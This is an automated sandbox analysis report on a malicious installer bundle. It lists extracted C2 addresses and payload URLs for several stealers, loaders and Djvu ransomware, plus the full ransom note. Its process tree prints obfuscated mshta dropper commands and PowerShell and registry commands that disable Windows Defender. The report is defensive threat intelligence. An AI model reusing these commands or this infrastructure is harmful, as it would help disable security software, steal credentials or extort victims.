Analysis
-
max time kernel
341s -
max time network
668s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
16-05-2022 11:48
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
e4c99dcc117b45dbd02c49723df0e5da
-
SHA1
9b31d81aa541f473360574fdbdd86aca2201033a
-
SHA256
5bfb87691070668037df7a6bc1eac92bdb683ada3159b83c136146632835cb7f
-
SHA512
2dc09c62ded7a3ce56b7584b2aeec228f9d7a26a1516b3d31af245c7f3513fcdb7da13cf7e47695390ee2ea02bbe5c5523c8c3f1a8780a3a6834de2e6cd416b5
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
redline
193.106.191.253:4752
-
auth_value
6dc858733096320e3d11256c87cea006
Extracted
redline
sehrish2
135.181.129.119:4805
-
auth_value
b69102cdbd4afe2d3159f88fb6dac731
Extracted
redline
ChrisNEW
194.104.136.5:46013
-
auth_value
9491a1c5e11eb6097e68a4fa8627fda8
Extracted
redline
media21
91.121.67.60:23325
-
auth_value
e37d5065561884bb54c8ed1baa6de446
Extracted
smokeloader
2020
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
http://monsutiur4.com/
http://nusurionuy5ff.at/
http://moroitomo4.net/
http://susuerulianita1.net/
http://cucumbetuturel4.com/
http://nunuslushau.com/
http://linislominyt11.at/
http://luxulixionus.net/
http://lilisjjoer44.com/
http://nikogminut88.at/
http://limo00ruling.org/
http://mini55tunul.com/
http://samnutu11nuli.com/
Extracted
redline
SUSHI
65.108.101.231:14648
-
auth_value
26bcdf6ae8358a98f24ebd4bd8ec3714
Extracted
redline
Build#10k
89.22.234.161:36760
-
auth_value
c22a130ec5d494a6a043d8ef902913cb
Extracted
redline
@humus228p
185.215.113.24:15994
-
auth_value
bb99a32fdff98741feb69d524760afae
Extracted
djvu
http://ugll.org/test3/get.php
-
extension
.kruu
-
offline_id
e8w5MeiBrZVoHLoloPm9MNlKBzXH70BB3B2KQ7t1
-
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-2w6I3WpXEh Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@time2mail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0477JIjdm
Extracted
amadey
3.10
185.215.113.38/f8dfksdj3/index.php
Extracted
redline
9-5
139.99.32.83:43199
-
auth_value
637de2b47f42d9cc7912f71cb6b57b5b
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detected Djvu ransomware 7 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 17 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
-
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
-
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 20 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 19 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops Chrome extension 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 13 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Kills process with taskkill 5 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05eeb2dae7b88520a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05eeb2dae7b88520a.exeFri05eeb2dae7b88520a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S074R.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-S074R.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$A0056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05eeb2dae7b88520a.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05eeb2dae7b88520a.exe"C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05eeb2dae7b88520a.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-U5Q63.tmp\Fri05eeb2dae7b88520a.tmp"C:\Users\Admin\AppData\Local\Temp\is-U5Q63.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$30120,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05eeb2dae7b88520a.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri055cc2a6e65.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri055cc2a6e65.exeFri055cc2a6e65.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05beb1e355.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05beb1e355.exeFri05beb1e355.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05cc28ce70b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05cc28ce70b.exeFri05cc28ce70b.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05cc28ce70b.exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if """" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05cc28ce70b.exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )6⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05cc28ce70b.exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "" == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05cc28ce70b.exe" ) do taskkill -f /im "%~Nxj"7⤵
-
C:\Users\Admin\AppData\Local\Temp\EiV4.ExeEIv4.Exe /pllbp0ygmDYA8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if ""/pllbp0ygmDYA "" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )9⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "/pllbp0ygmDYA " == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" ) do taskkill -f /im "%~Nxj"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscript: clOSe ( creAteOBJECT( "WSCrIPt.sHElL" ). rUn ( "cMD /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = ""MZ"" > YAnI.V & COPy /Y /b YANI.V + L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ + 51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_ " , 0 , tRuE ) )9⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = "MZ" > YAnI.V & COPy /Y /b YANI.V +L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ +51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCho "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>YAnI.V"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec /y .\W72F~U.S8_11⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /im "Fri05cc28ce70b.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05a277b9a3d2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05a277b9a3d2.exeFri05a277b9a3d2.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05a277b9a3d2.exeC:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05a277b9a3d2.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri0575b7d291a755f8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri0575b7d291a755f8.exeFri0575b7d291a755f8.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05f84fa77402bf.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05f84fa77402bf.exeFri05f84fa77402bf.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05f84fa77402bf.exeC:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05f84fa77402bf.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri05b5df5106928d62.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4BD25486\Fri05b5df5106928d62.exeFri05b5df5106928d62.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"6⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbbd1e4f50,0x7ffbbd1e4f60,0x7ffbbd1e4f707⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1724 /prefetch:27⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1772 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2304 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:17⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4664 /prefetch:27⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4236 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4296 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4984 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:87⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1688,8738222864180521046,2540001497931967757,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:17⤵
-
C:\Users\Admin\Pictures\Adobe Films\jP1qOWqCUu7X2Ey9N5XnB4Vv.exe"C:\Users\Admin\Pictures\Adobe Films\jP1qOWqCUu7X2Ey9N5XnB4Vv.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\JMMVobtqFIT08NRQFnV5r5A8.exe"C:\Users\Admin\Pictures\Adobe Films\JMMVobtqFIT08NRQFnV5r5A8.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\2mINnJsdqZoXPQgy84NXRD9g.exe"C:\Users\Admin\Pictures\Adobe Films\2mINnJsdqZoXPQgy84NXRD9g.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\_4DpN4ef3_hGGbfIlo60M9rZ.exe"C:\Users\Admin\Documents\_4DpN4ef3_hGGbfIlo60M9rZ.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\WVe_SxM7s_ZNX4LD1RImrtwP.exe"C:\Users\Admin\Pictures\Adobe Films\WVe_SxM7s_ZNX4LD1RImrtwP.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Sml88nFw2zS1D2QYpjA9b_u7.exe"C:\Users\Admin\Pictures\Adobe Films\Sml88nFw2zS1D2QYpjA9b_u7.exe"8⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\Pictures\Adobe Films\8yY52AJwjOK4iOS66M2EOKZx.exe"C:\Users\Admin\Pictures\Adobe Films\8yY52AJwjOK4iOS66M2EOKZx.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSBBB5.tmp\Install.exe.\Install.exe9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS471C.tmp\Install.exe.\Install.exe /S /site_id "525403"10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
